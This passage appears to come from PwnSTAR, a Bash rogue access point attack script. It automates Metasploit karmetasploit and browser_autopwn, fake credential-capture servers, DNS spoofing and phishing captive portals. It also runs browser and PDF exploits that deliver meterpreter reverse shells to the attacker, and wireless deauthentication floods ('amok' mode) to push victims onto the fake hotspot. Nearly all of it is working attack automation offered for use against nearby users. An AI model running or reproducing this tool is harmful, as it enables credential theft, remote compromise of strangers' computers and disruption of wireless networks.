    echo "use auxiliary/server/browser_autopwn" > /tmp/karma.rc
    echo "setg AUTOPWN_HOST $ap_ip" >> /tmp/karma.rc
    echo "setg AUTOPWN_PORT 55550" >> /tmp/karma.rc
    echo "setg AUTOPWN_URI /ads" >> /tmp/karma.rc
    echo "set LHOST $ap_ip" >> /tmp/karma.rc
    echo "set LPORT 45000" >> /tmp/karma.rc
    echo "set SRVPORT 55550" >> /tmp/karma.rc
    echo "set URIPATH /ads" >> /tmp/karma.rc
    echo "run" >> /tmp/karma.rc
    echo "use auxiliary/server/capture/pop3" >> /tmp/karma.rc
    echo "set SRVPORT 110" >> /tmp/karma.rc
    echo "set SSL false" >> /tmp/karma.rc
    echo "run" >> /tmp/karma.rc
    echo "use auxiliary/server/capture/pop3" >> /tmp/karma.rc
    echo "set SRVPORT 995" >> /tmp/karma.rc
    echo "set SSL true" >> /tmp/karma.rc
    echo "run" >> /tmp/karma.rc
    echo "use auxiliary/server/capture/ftp" >> /tmp/karma.rc
    echo "run" >> /tmp/karma.rc
    echo "use auxiliary/server/capture/imap" >> /tmp/karma.rc
    echo "set SSL false" >> /tmp/karma.rc
    echo "set SRVPORT 143" >> /tmp/karma.rc
    echo "run" >> /tmp/karma.rc
    echo "use auxiliary/server/capture/imap" >> /tmp/karma.rc
    echo "set SSL true" >> /tmp/karma.rc
    echo "set SRVPORT 993" >> /tmp/karma.rc
    echo "run" >> /tmp/karma.rc
    echo "use auxiliary/server/capture/smtp" >> /tmp/karma.rc
    echo "set SSL false" >> /tmp/karma.rc
    echo "set SRVPORT 25" >> /tmp/karma.rc
    echo "run" >> /tmp/karma.rc
    echo "use auxiliary/server/capture/smtp" >> /tmp/karma.rc
    echo "set SSL true" >> /tmp/karma.rc
    echo "set SRVPORT 465" >> /tmp/karma.rc
    echo "run" >> /tmp/karma.rc
    echo "use auxiliary/server/fakedns" >> /tmp/karma.rc
    echo "unset TARGETHOST" >> /tmp/karma.rc
    echo "set SRVPORT 5353" >> /tmp/karma.rc
    echo "run" >> /tmp/karma.rc
    echo "use auxiliary/server/fakedns" >> /tmp/karma.rc
    echo "unset TARGETHOST" >> /tmp/karma.rc
    echo "set SRVPORT 53" >> /tmp/karma.rc
    echo "run" >> /tmp/karma.rc
    echo "use auxiliary/server/capture/http" >> /tmp/karma.rc
    echo "set SRVPORT 80" >> /tmp/karma.rc
    echo "set SSL false" >> /tmp/karma.rc
    echo "run" >> /tmp/karma.rc
    echo "use auxiliary/server/capture/http" >> /tmp/karma.rc
    echo "set SRVPORT 8080" >> /tmp/karma.rc
    echo "set SSL false" >> /tmp/karma.rc
    echo "run" >> /tmp/karma.rc
    echo "use auxiliary/server/capture/http" >> /tmp/karma.rc
    echo "set SRVPORT 443" >> /tmp/karma.rc
    echo "set SSL true" >> /tmp/karma.rc
    echo "run" >> /tmp/karma.rc
    echo "use auxiliary/server/capture/http" >> /tmp/karma.rc
    echo "set SRVPORT 8443" >> /tmp/karma.rc
    echo "set SSL true" >> /tmp/karma.rc
    echo "run" >> /tmp/karma.rc
    sleep 1
    
    echo -e "$info\nLaunching karmetasploit..." 
    Eterm -g 104x25-0-0 --pointer-color "dark orange" -f DarkOrchid4 -b LightYellow1 --font-fx none --buttonbar 0  --scrollbar 0 -T "Karmetasploit" -e msfconsole -r /tmp/karma.rc 2> /dev/null &
    sleep 8
    echo -e "$info\nBe patient..."
    sleep 8
    echo -e "$info\nBe patient..."
    sleep 16
    echo -e "$info\nBe very patient..."
    sleep 24
    echo -e "$info\nCount the sessions!!!"
    sleep 8
    echo -e "$info\nLmao. You won't get any shells against modern systems ;-)"
    sleep 8
}

browser_autopwn_fn()
{
    dns_fn
    iptables -t nat -A PREROUTING -i at0 -j REDIRECT
    service apache2 stop
    sleep 0.5
    echo -e "$info\nMetasploit starting..."     
    cat /dev/null > /tmp/br_autopwn.rc > /dev/null # clear pre-existing karma.rc
    echo "use auxiliary/server/browser_autopwn" > /tmp/br_autopwn.rc
    echo "set LHOST $ap_ip" >> /tmp/br_autopwn.rc
    echo "set SRVHOST 0.0.0.0" >> /tmp/br_autopwn.rc
    echo "set SRVPORT 80" >> /tmp/br_autopwn.rc
    echo "set URIPATH /" >> /tmp/br_autopwn.rc
    echo "exploit" >> /tmp/br_autopwn.rc
    sleep 0.5
    echo -e "$info\nLaunching browser_autopwn..." 
    Eterm -g 104x25-0-0 --pointer-color "dark orange" -f DarkOrchid4 -b LightYellow1 --font-fx none --buttonbar 0  --scrollbar 0 -T "Browser_autopwn" -e msfconsole -r /tmp/br_autopwn.rc 2> /dev/null &
    sleep 8
    echo -e "$info\nBe patient..."
    sleep 16
    echo -e "$info\nBe extremely patient..."
    sleep 32
    echo -e "$warn\n*** MUST STOP DNSSpoof as soon as you have a session ***
    
(if msf doesn't handle requests properly,
the victim will not get internet access,
and will probably disconnect)"
    sleep 16
    echo -e "$info\nWait..."
    sleep 60
    adv_final_fn
}

# ~~~~~~~~~~ Advanced Functions ~~~~~~~~~~ #

adv_usage_fn()
{
    clear
    apusage=
    echo -e "$def
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
                                   Advanced Menu
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n
    a) Captive portals (phish/sniff)
    
    b) Captive portal + PDF exploit (targets Adobe Reader < v9.3)

    c) MSXML 0day (CVE-2012-1889: MSXML Uninitialized Memory Corruption)
    
    d) Java_jre17_jmxbean
    
    e) Choose another browser exploit
         
         
    q) Exit from the script

    z) Return to basic menu
    "
    read apusage
    if [[ $apusage = q ]];then
        exit_fn
    elif [[ $apusage = z ]];then
        first_fn
    elif [[ $apusage != a && $apusage != b && $apusage != c && $apusage != d && $apusage != e ]];then
        adv_usage_fn
    elif [[ $apusage = a || $apusage = b ]];then ###
        if [[ ! -e /usr/sbin/incrond ]];then 
            echo -e "$warn\nNeed to install incron"
            sleep 1
            echo -e "$q\nDo you want to do it now? (y/n)"
            read var
            if [[ $var == y ]];then
                apt-get install incron
            else
                adv_usage_fn
            fi
        fi
    fi
    service apache2 stop &> /dev/null
    setup_fn
}

adv_dir_fn()
{
    echo -e "$info\nSetting up the web page..."
    mkdir /var/www/backups &>/dev/null          # make backup directory NB clear this out occasionally
    mv /var/www/index.html /var/www//backups/index.html.`date +%Y%m%d%H%M` &>/dev/null  # back-up existing index files
    mv /var/www/index.php /var/www/backups/index.php.`date +%Y%m%d%H%M` &>/dev/null 
    cp /var/www/"$wwwdir"/index.* /var/www/     # copy index from phishing folder to var/www
    if [[ $? -ne 0 ]] ;then                     # checks exit code of last command ie did it work?
        echo -e "$warn\nError copying index"
        sleep 2
        adv_usage_fn
    else 
        sleep 0.5
        echo -e "$info\n$wwwdir/index moved into position"
        sleep 0.5
    fi
}

portals_fn()
{

    echo -e "$q\nWhich portal service page? (1/2)
    
    1) Hotspot
    2) Simple (you can name this)
    "
    read pspage
    if [[ $pspage == 1 ]];then
        wwwdir=portal_hotspot
    elif [[ $pspage == 2 ]];then 
        wwwdir=portal_simple
    elif [[ $pspage != 1 && $pspage != 2 ]];then
        echo -e "$warn\nWhat's it gunna be babe...1 or 2?"
        sleep 2
        portals_fn
    fi
    
    adv_dir_fn

    if [[ $pspage == 2 ]];then 
        echo -e "$q\nWhat shall we call the portal?\n
        \"Welcome to ....(your name)\"
        e.g. Joe's Cybercafe, GoldmanSucks Private Net\n
        (Best to choose something similar to target)"
        read var
        echo $var > /tmp/name   # will be read and displayed by index.php
    fi
    apache_fn
    captive_iptab_fn
    
    service incron start
    # chkconfig incrond on
    echo "/tmp/ip/ip IN_MODIFY bash /tmp/ipmac" > /var/spool/incron/root # instruct incron to run script whenever a new mac is written ###(/etc/incron.d/root)
    echo -e "\e[40;1;34m"
    incrontab -d # reload the new incron table

    tail_txtfile_fn
    sleep 4
    adv_final_fn 
}

pdf_fn()
{
    echo -e "$q\nWhat shall we call the portal?\n
    \"Welcome to ....(your name)\"
    e.g. Joe's Cybercafe, GoldmanSucks Private Net\n
    (Best to choose similar to AP essid)"
    read var
    echo $var > /tmp/name   # will be read and displayed by index.php
    
    # thanks LHYX1 crypter.py
    echo -e "$q\nSelect the PDF\n$info
        1) Exploit: adobe_pdf_embedded_exe
           Payload: meterpreter/reverse_tcp
           Encoding: shikata-ga-nai X2
             (runs quickly, but may be detected by AV)
            
        2) Similar, obfuscated through LHYX1 crypter
            
        3) I will supply the PDF"
    read pdftype
    case $pdftype in
        1) pdf=aup1.pdf;;
        2) pdf=aup2.pdf;;
        3) echo "$warn\nName your file aup3.pdf
Include text: \"ACCESS CODE: 1367\", to allow victims through the captive portal
Place aup3.pdf in /var/www/portal_pdf/
Set permissions"
           pdf=aup3.pdf
           sleep 3;;
    esac
    echo $pdf >/tmp/pdf # value to be read by index.php
    
    wwwdir=portal_pdf    
    adv_dir_fn
    apache_fn
    captive_iptab_fn
    echo -e "$info"
    service incron start
    echo -e "$info"
    
    echo "/tmp/ip/ip IN_MODIFY bash /tmp/ipmac" > /var/spool/incron/root # instruct incron to run script whenever a new mac is written ###(/etc/incron.d/root)
    incrontab -d # reload the new incron table
  
    if [[ $pdftype = 3 ]]; then
        echo -e "$warn\nYou will need to start the appropriate payload/handler in a separate shell"
        sleep 2
    else     # start metasploit-handler
        echo -e "$info\nReverse meterpreter handler starting..."
        cat /dev/null > /tmp/pdf.rc > /dev/null # clear pre-existing rc
        echo "use multi/handler
set PAYLOAD windows/meterpreter/reverse_tcp
set LHOST $ap_ip
set LPORT 443
set ExitOnSession false
exploit -j" > /tmp/pdf.rc
        sleep 0.5
        Eterm -g 104x25-0-0 --pointer-color "dark orange" -f DarkOrchid4 -b LightYellow1 --font-fx none --buttonbar 0  --scrollbar 0 -T "Metasploit Handler" -e msfconsole -r /tmp/pdf.rc 2> /dev/null &
        sleep 8
        echo -e "$info\nTakes a while..."
    fi
    sleep 10
    adv_final_fn
 }

browser_exploit_fn()
{
    cat /dev/null > /tmp/msf.rc > /dev/null # clear pre-existing rc
    echo "search type:exploit path:browser app:client" > /tmp/msf.rc
    Eterm -g 200x100-0-0 --pointer-color "dark orange" -f DarkOrchid4 -b LightYellow1 --font-fx none --buttonbar 0  --scrollbar 0 -T "Metasploit" -e msfconsole -r /tmp/msf.rc 2> /dev/null &
    echo -e "$info\nWe're going to build a resource file for msf
This will only work for exploits coded in the usual msf style, with standard options
If it fails, edit PwnSTAR directly: browser_exploit_fn"
    sleep 2
    echo -e "$q\nCopy and paste your chosen exploit:"
    read exploit
    echo "use $exploit
show payloads" > /tmp/msf.rc
    echo -e "$info\nType exit within msf to close msf Eterms"
    Eterm -g 170x50-0-0 --pointer-color "dark orange" -f DarkOrchid4 -b LightYellow1 --font-fx none --buttonbar 0  --scrollbar 0 -T "Metasploit" -e msfconsole -r /tmp/msf.rc 2> /dev/null &
    sleep 2
    echo -e "$q\nCopy and paste your chosen payload:"
    read payload
    
    echo -e "$info\nNeed to dns spoof to redirect victims to the metasploit webserver"
    dns_fn
    echo -e "$info\nMetasploit starting..."
    cat /dev/null > /tmp/msf.rc > /dev/null
    echo "use $exploit
set SRVHOST $ap_ip
set SRVPORT 80
set URIPATH /
set payload $payload
set LHOST $ap_ip
set LPORT 443
exploit -j" > /tmp/msf.rc ### custom exe? set EXE::Custom /var/www/mypayload.exe
    sleep 0.5
    Eterm -g 104x25-0-0 --pointer-color "dark orange" -f DarkOrchid4 -b LightYellow1 --font-fx none --buttonbar 0  --scrollbar 0 -T "Metasploit" -e msfconsole -r /tmp/msf.rc 2> /dev/null &
    sleep 4
    echo -e "$info\nTakes a while..."
    sleep 4
    echo -e "$warn\n*** MUST STOP DNSSpoof as soon as you have a session ***
    
(if msf fails to handle requests properly,
the victim will not get internet access,
and will probably disconnect)

Wait..."

    sleep 20
    adv_final_fn 
    }
    
java_jre17_jmxbean_fn ()
{
    echo -e "$info\nNeed to dns spoof to redirect victims to the metasploit webserver"
    dns_fn
    echo -e "$info\nMetasploit starting..."
    cat /dev/null > /tmp/msf.rc > /dev/null # clear pre-existing rc
    echo "use exploit/multi/browser/java_jre17_jmxbean
set SRVHOST $ap_ip
set SRVPORT 80
set URIPATH /
set payload java/meterpreter/reverse_tcp
set LHOST $ap_ip
set LPORT 443
exploit -j" > /tmp/msf.rc ### custom exe? set EXE::Custom /var/www/mypayload.exe
    sleep 0.5
    Eterm -g 104x25-0-0 --pointer-color "dark orange" -f DarkOrchid4 -b LightYellow1 --font-fx none --buttonbar 0  --scrollbar 0 -T "Metasploit" -e msfconsole -r /tmp/msf.rc 2> /dev/null &
    sleep 4
    echo -e "$info\nTakes a while..."
    sleep 4
    echo -e "$warn\n*** MUST STOP DNSSpoof as soon as you have a session ***
    
(if msf fails to handle requests properly,
the victim will not get internet access,
and will probably disconnect)

Wait..."

    sleep 20
    adv_final_fn 
}   
    
zday_fn()
{
    dns_fn
    echo -e "$info\nMetasploit starting..."
    cat /dev/null > /tmp/msf.rc > /dev/null # clear pre-existing rc
    echo "use exploit/windows/browser/msxml_get_definition_code_exec
set OBFUSCATE true
set SRVHOST $ap_ip
set SRVPORT 80
set URIPATH /
set payload windows/meterpreter/reverse_tcp
set LHOST $ap_ip
exploit -j" > /tmp/msf.rc
    sleep 0.5
    Eterm -g 104x25-0-0 --pointer-color "dark orange" -f DarkOrchid4 -b LightYellow1 --font-fx none --buttonbar 0  --scrollbar 0 -T "Metasploit" -e msfconsole -r /tmp/msf.rc 2> /dev/null &
    sleep 4
    echo -e "$info\nTakes a while..."
    sleep 4
    echo -e "$warn\n*** MUST STOP DNSSpoof as soon as you have a session ***
    
(if msf fails to handle requests properly,
the victim will not get internet access,
and will probably disconnect)

Wait..."

    sleep 20
    adv_final_fn 
    }

# ~~~~~~~~~~ Iptables Functions ~~~~~~~~~~ #

captive_iptab_fn()
# The starting point for the iptables was http://simple-and-hot.blogspot.com.au/2010/05/you-can-do-it-yourself.html
{
    echo -e "$info\nSetting up iptables...\n\n"
    
    # Allow DHCP and DNS requests from any user:
    iptables -t nat -A PREROUTING -m state --state NEW,ESTABLISHED,RELATED,INVALID -p udp --dport 67 -j ACCEPT
    iptables -t nat -A PREROUTING -m state --state NEW,ESTABLISHED,RELATED,INVALID -p tcp --dport 67 -j ACCEPT
    iptables -t nat -A PREROUTING -m state --state NEW,ESTABLISHED,RELATED,INVALID -p udp --dport 53 -j ACCEPT
    iptables -t nat -A PREROUTING -m state --state NEW,ESTABLISHED,RELATED,INVALID -p tcp --dport 53 -j ACCEPT
    
    # All other traffic goes to the portal page: 
    iptables -t nat -A PREROUTING -p tcp -j DNAT --to "$ap_ip":80
    iptables -t nat -A PREROUTING -p udp -j DNAT --to "$ap_ip":80
    
    ## Create a captive NET and send approved users there ### causes difficulties with sslstrip
    #iptables -t nat -N NET
    #iptables -t nat -A PREROUTING -j NET
    ## Currently set to give full access    
    #iptables -t nat -A NET -j ACCEPT
    
    # Double-check we are forwarding
    echo "1" > /proc/sys/net/ipv4/ip_forward
    iptables -t nat -A POSTROUTING -o $ICI -j MASQUERADE ### not nec?
    
    # File to store MAC of clients
    mkdir /tmp/ip
    touch /tmp/ip/ip
    chown -f root:www-data /tmp/ip/ip
    chmod -f 775 /tmp/ip/ip
    
    cat /etc/incron.allow | grep root &> /dev/null
    if [ $? -ne 0 ];then
        echo -e "$q\nNeed to add user root to incron.allow\nDo it now?"
        read var
        if [[ $var == y ]];then
            echo "root" >> /etc/incron.allow #append in case incron.allow has other entries pre-existing
            echo -e "$info\nDone\n"
        else
            exit_fn
        fi
     fi
                
    # Make script to set new rules per client MAC. Will be run by incron
    echo "
#!bin/bash
mac=\$(cat /tmp/ip/ip)
iptables -t nat -I PREROUTING -m mac --mac-source \$mac -j ACCEPT
if [[ -e /tmp/sslstrip ]];then
sslstrip=\$(cat /tmp/sslstrip)   # read value exported from main script
if [[ \$sslstrip = y ]];then    # allows sslstrip redirect per client MAC
    iptables -t nat -I PREROUTING -p tcp --destination-port 80 -m mac --mac-source \$mac -j REDIRECT --to-port 10000
fi
fi" > /tmp/ipmac
    chmod +x /tmp/ipmac
    sleep 0.5
    
}

# ~~~~~~~~~~ Deauth Functions ~~~~~~~~~~ #

deauth_presets_fn()
{
    if [[ -z $deauthchan ]];then    # default to AP channel, unless deauth channel has already been set
        deauthchan=$apchan      
    fi
    if [[ -z $time ]];then          # ditto for time
        time="0"
    fi
}

aireplaydeauth_setup_fn()
{
    clear
    sleep 1
    echo -e "$def
    
Aireplay-ng Deauth Setup:
    
    
        1) Target BSSID MAC                     \e[1;36m[$tarbssid]
    $def
        2) Target Client MAC                    \e[1;36m[$clientmac]
    $def
           (Preferred, but not essential)
        
        3) Channel                              \e[1;36m[$deauthchan]
    $def
        4) Host MAC                             \e[1;36m[$ap_mac]
    $def
           (Usually just accept this default)
        
        5) Duration of attack                   \e[1;36m[$time]
    $def
           (Time in secs, or 0 for continuous (DOS))
        
        c) Start
    
    "
    read var
    case $var in
    
        1) echo -e "$q\nEnter Target BSSID
        
      To copy and paste from eterm:
        
        press spacebar to pause scan, 
        highlight to copy
        then middle click/3-finger tap to paste
        
        (press spacebar again to watch the deauth)\n"
        read tarbssid
        aireplaydeauth_setup_fn;;
        
        2) echo "Enter Client MAC"
        read clientmac
        aireplaydeauth_setup_fn;;
        
        3) echo "Enter channel"
        read deauthchan
        aireplaydeauth_setup_fn;;
        
        4) echo "Enter our MAC"
        read hostmac
        aireplaydeauth_setup_fn;;
        
        5) echo "Enter duration of attack
        (Time in secs, or 0 for continuous (DOS))"
        read time
        aireplaydeauth_setup_fn;;
        
        c) if [[ -z "$tarbssid" || -z $deauthchan || -z $ap_mac || -z $time ]];then
                echo -e "$warn\nWake up - you haven't filled all required parameters"
                sleep 3
                aireplaydeauth_setup_fn
           fi;;
            
        *) aireplaydeauth_setup_fn
    esac
}       

mondeauth_start_fn()
{
    if [[ -z $mondeauth ]];then
        echo -e "$info\nStarting new monitor interface for deauth..."    # new mon interface to avoid changing AP channel
        mondeauth=$(airmon-ng start $API|grep enabled|awk '{ print $5"" }'|cut -c -4)
        sleep 2
        dev_check_var=$mondeauth
        dev_check_fn
        if [[ $dev_check == "fail" ]]; then
            mondeauth=
            initial_scan_fn
        fi

        echo -e "$info\nMacchanging $mondeauth..." ### would we ever want to set the mac manually?
        ifconfig $mondeauth down && macchanger -m $ap_mac $mondeauth && ifconfig $mondeauth up
        sleep 2
        fi
    
}
   
aireplaydeauth_fn()
{
    if [[ -z $clientmac ]];then
        Eterm -g 80x10-0-0 --pointer-color "dark orange" -f DarkOrchid4 -b LightYellow1 -r --font-fx none --buttonbar 0  --scrollbar 0 -T "Deauth $tarbssid" -e aireplay-ng -0 $time -a $tarbssid -h $ap_mac $mondeauth  2> /dev/null & deauthpid=$!
    else
        Eterm -g 80x10-0-0 --pointer-color "dark orange" -f DarkOrchid4 -b LightYellow1 -r --font-fx none --buttonbar 0  --scrollbar 0 -T "Deauth client $client on $tarbssid" -e aireplay-ng -0 $time -a $tarbssid -c $clientmac -h $ap_mac $mondeauth  2> /dev/null & deauthpid=$!
    fi
    if [[ $time = 0 ]];then
        echo -e "$warn\n\n\nWITHIN eterm,$info press ctrl-C to stop the continuous deauth\n\nCtrl-C again to close the window"
        sleep 12
    fi
}       
        
MDK3_fn()
{
    echo -e "$q\nAre we:
    
    1) running amok (deauthing everyone in range)!!
    2) performing a surgical strike"
    read var
    if [[ $var = 1 ]];then
        echo "$ap_mac" > /tmp/whitelist # don't deauth PwnSTAR
        echo "$ici_mac" >> /tmp/whitelist # don't deauth our internet connection
        # do deauth everyone else
        Eterm -g 80x10-0-0 --pointer-color "dark orange" -f DarkOrchid4 -b LightYellow1 -r --font-fx none --buttonbar 0  --scrollbar 0 -T "Amok Deauth!!" -e mdk3 $mondeauth d -w /tmp/whitelist 2> /dev/null & deauthpid=$! 
    else
        echo -e "$q\nEnter MAC of target (client or AP)"
        read var 
        echo $var > /tmp/blacklist
        Eterm -g 80x10-0-0 --pointer-color "dark orange" -f DarkOrchid4 -b LightYellow1 -r --font-fx none --buttonbar 0  --scrollbar 0 -T "Deauth $var" -e mdk3 $mondeauth d -w /tmp/blacklist 2> /dev/null & deauthpid=$! 
    fi
    sleep 1
    echo -e "$info\nCtrl-c within the Eterm to stop the deauth"
    sleep 4
    }
    
airdrop_fn()
{
    killall -q airodump-ng &> /dev/null # stop any pre-existing scan
    kill -9 $scanpid &> /dev/null       # stop any pre-existing scan Eterm
    sleep 0.5
    clear
    rm /tmp/rules &> /dev/null 
    # You may need to edit this depending how/which airdrop is installed
    # I find airdrop very easy to break - be careful!
    echo -e "$info\nWe need a rules file"
    sleep 0.5 
    echo -e "$info\nThe format is:
    
  # allow
  a(/bssid mac(or 'any')|client mac(or 'any')
  # deny
  d/bssid mac(or 'any')|client mac(or 'any')

  eg
  a/our AP mac|any
  d/any|any"
    sleep 0.5 
    echo -e "$q\n
    1) I already have one
    2) Let's knock everyone off everything
"
    read var
    if [[ $var = 1 ]];then
        echo -e "$q\nEnter the absolute path to the file"
        read rules
    elif [[ $var = 2 ]];then
        echo "a/$ap_mac|any" > /tmp/rules
        echo "a/any|$ici_mac" >> /tmp/rules
        echo "d/any|any" >> /tmp/rules     
        rules=/tmp/rules
    else
        airdrop_fn
    fi
    echo -e "$info\nStarting airodump capture..."
    killall -q airodump-ng &> /dev/null # stop any pre-existing scan again - messes with airdrop
    kill -9 $scanpid &> /dev/null          
    monscan_start_fn
    rm /tmp/capture* &> /dev/null
    clear
    sleep 0.5
    Eterm -g 90x30-0-0 --pointer-color "dark orange" -f DarkOrchid4 -b LightYellow1 --font-fx none --buttonbar 0  --scrollbar 0 -T "Airdrop scan" -e airodump-ng $monscan -w /tmp/capture --output-format csv 2> /dev/null & scanpid=$!
    sleep 1
    echo -e "$info\nStarting airdrop..."
    sleep 8 # to allow airodump to write .csv file
    Eterm -g 80x10-0-0 --pointer-color "dark orange" -f DarkOrchid4 -b LightYellow1 -r --font-fx none --buttonbar 0  --scrollbar 0 -T "Airdrop" -e airdrop-ng -i $mondeauth -t /tmp/capture-01.csv -r $rules 2> /dev/null & deauthpid=$! 
    echo -e "$info\nNote you can edit /tmp/rules at any time, even with airdrop running"
    sleep 1
    echo -e "$info\nCtrl-c within the Eterms to stop the deauth"
    sleep 6
    }
    
# ~~~~~~~~~~ Exit Functions ~~~~~~~~~~ #

final_fn()
{
    clear
    sleep 1
    echo -e "\n$q\nDo you want to:
    
        1. Re-scan
        2. De-auth (get clients off their AP, and onto PwnSTAR)
        3. Give internet access to victims from your webpage eg \"hotspot\"
          (and then sniff 'em)
        
        q. Quit (reverse everything)"
    read var
    case $var in
    
        1)  rescan_fn 
            final_fn;;
           
        2)  echo -e "$q\nDo you want to scan first eg to discover MACs? (y/n)"
            read rescan
            if [ $rescan = y ];then
                rescan_fn
            elif [[ $rescan != n ]];then # any value other than n restarts the function
                echo -e "$warn\nWhat's it gunna be babe...yes or no?"
                sleep 2
                rescan=
                final_fn
            fi
            echo -e "$q\nDo you want to use:
            
    a) Aireplay
    
    b) MDK3 (checkout the amok mode :-) )
    
    c) Airdrop (powerful rules-based deauth)"
            read deauthtype
            deauth_presets_fn
            if [[ -n "$deauthpid" ]];then # kill any existing deauth eterm window
                kill "$deauthpid" &>/dev/null
            fi 
            case $deauthtype in
            
                a) rescan_fn
                   aireplaydeauth_setup_fn
                   mondeauth_start_fn
                   iwconfig $mondeauth channel $deauthchan
                   aireplaydeauth_fn
                   final_fn;;
                   
                b) mondeauth_start_fn
                   MDK3_fn
                   final_fn;;
                
                c) if [[ ! -e /usr/local/bin/airdrop-ng ]];then
                        echo -e "$warn\nAirdrop not installed\nSee my how-to at Kali forums"
                        sleep 3
                        final_fn
                    fi
                   mondeauth_start_fn
                   airdrop_fn
                   final_fn;;
                
                *) final_fn;;
            esac;;
            
        3)  if [[ $apusage != 4 ]];then
                echo -e "$warn\nOption not available (in this attack mode)"
                sleep 2
                final_fn
            fi
            if [[ $internet = n ]];then
                echo -e "$warn\nNo can do - no internet!"
                sleep 2
                final_fn
            fi
                    
            echo -e "$warn\nThis assumes you are already serving an appropriate webpage\n
To allow the victim internet access, dnsspoof will be stopped,\ntherefore new connections to the AP will not see the webpage\n
If you want multiple connections, start again with the advanced menu options"
            sleep 0.5
            echo -e "$info\nThere are better ways of doing this in the advanced menu"
            sleep 1 
            echo -e "$info\nStopping dnsspoof..."
            killall -q dnsspoof &> /dev/null # stop dnsspoof
            sleep 1 
            echo -e "$q\nDo you want to set up sniffing? (y/n)"
            read var
            if [[ $var = y ]];then
                sniff_fn
            fi
            final_fn;;
            
        q)  exit_fn;;
        
        *)  final_fn;;
    esac
}

adv_final_fn()
{
    clear
    sleep 1
    echo -e "\n$q\nDo you want to:
    
        1. Re-scan
        2. De-auth (get clients off their AP, and onto PwnSTAR)
        3. Sniff victims once they are through the portal
        4. Stop DNSSpoof (if running)
        
        q. Quit (reverse everything)"
    read var
    case $var in
    
        1)  rescan_fn 
            adv_final_fn;;
           
        2)  echo -e "$q\nDo you want to scan first eg to discover MACs? (y/n)"
            read rescan
            if [ $rescan = y ];then
                rescan_fn
            elif [[ $rescan != n ]];then # any value other than n restarts the function
                echo -e "$warn\nWhat's it gunna be babe...yes or no?"
                sleep 2
                rescan=
                adv_final_fn
            fi

            echo -e "$q\nDo you want to use:
            
    a) Aireplay
    
    b) MDK3 (checkout the amok mode :-) )
    
    c) Airdrop (powerful rules-based deauth)"
    
            read deauthtype
            deauth_presets_fn
            if [[ -n "$deauthpid" ]];then # kill any existing deauth eterm window
                kill "$deauthpid" &>/dev/null
            fi    
            case $deauthtype in
            
                a) rescan_fn
                   aireplaydeauth_setup_fn
                   mondeauth_start_fn
                   iwconfig $mondeauth channel $deauthchan
                   aireplaydeauth_fn
                   adv_final_fn;;
                   
                b) mondeauth_start_fn
                   MDK3_fn
                   adv_final_fn;;
                
                c) if [[ ! -e /usr/local/bin/airdrop-ng ]];then
                        echo -e "$warn\nAirdrop not installed\nSee my how-to at Kali forums"
                        sleep 3
                        final_fn
                   fi
                   mondeauth_start_fn
                   airdrop_fn
                   adv_final_fn;;
                
                *) adv_final_fn;;
            esac;;
 
           
        3)  if [[ $apusage = 6 ]];then
                                echo -e  "$warn\nOption not available"
                                sleep 2
                                adv_final_fn
                        fi
                        sniff_fn
            adv_final_fn;;
            
        4)  echo -e "$info\nStopping dnsspoof..."
            killall -q dnsspoof &> /dev/null
            sleep 1 
            adv_final_fn;;

        q)  exit_fn;;
        
        *)  adv_final_fn;;
    esac
}

exit_fn()
{
    clear
    echo -e "$info\nStopping processes...\n"
    killall -q tail airbase-ng ferret sslstrip aireplay-ng airodump-ng dhcpd dnsspoof metasploit incrond &> /dev/null
    sleep 1
    killall -q Eterm &> /dev/null 
    echo -e "$info\n\nClearing files...\n"
    rm /tmp/ip/ip &> /dev/null
    rmdir /tmp/ip &> /dev/null
    rm /tmp/custom.hosts &> /dev/null
    rm /tmp/sslstrip &> /dev/null

    # rm /var/spool/incron/root &> /dev/null ###
    service apache2 stop
    echo -e "\e[40;1;34m"
    service incron stop
    echo "0" > /proc/sys/net/ipv4/ip_forward
    echo -e "$info\n\nStopping monitor interfaces...\n"
    airmon-ng stop $monap &> /dev/null
    airmon-ng stop $monscan &> /dev/null
    airmon-ng stop $mondeauth &> /dev/null
    
    airmon-ng stop mon0 &> /dev/null; airmon-ng stop mon1 &> /dev/null ### Temporary fix for the "multiple mon" bug

    iptables --flush    # delete all rules in default (filter) chains
    iptables -t nat --flush
    iptables -t mangle --flush
    iptables -X         # delete user-defined chains
    iptables -t nat -X
    iptables -t mangle -X
    clear
    echo -e "\e[40;1;37m\nGood-bye from the PwnSTAR!
        
        
    "
    sleep 3
    echo -e "\e[0m"     # reset colours
    clear
    exit 0

}
# ~~~~~~~~~~ Main Script 2 lines!!! ~~~~~~~~~~ #

banner_fn
first_fn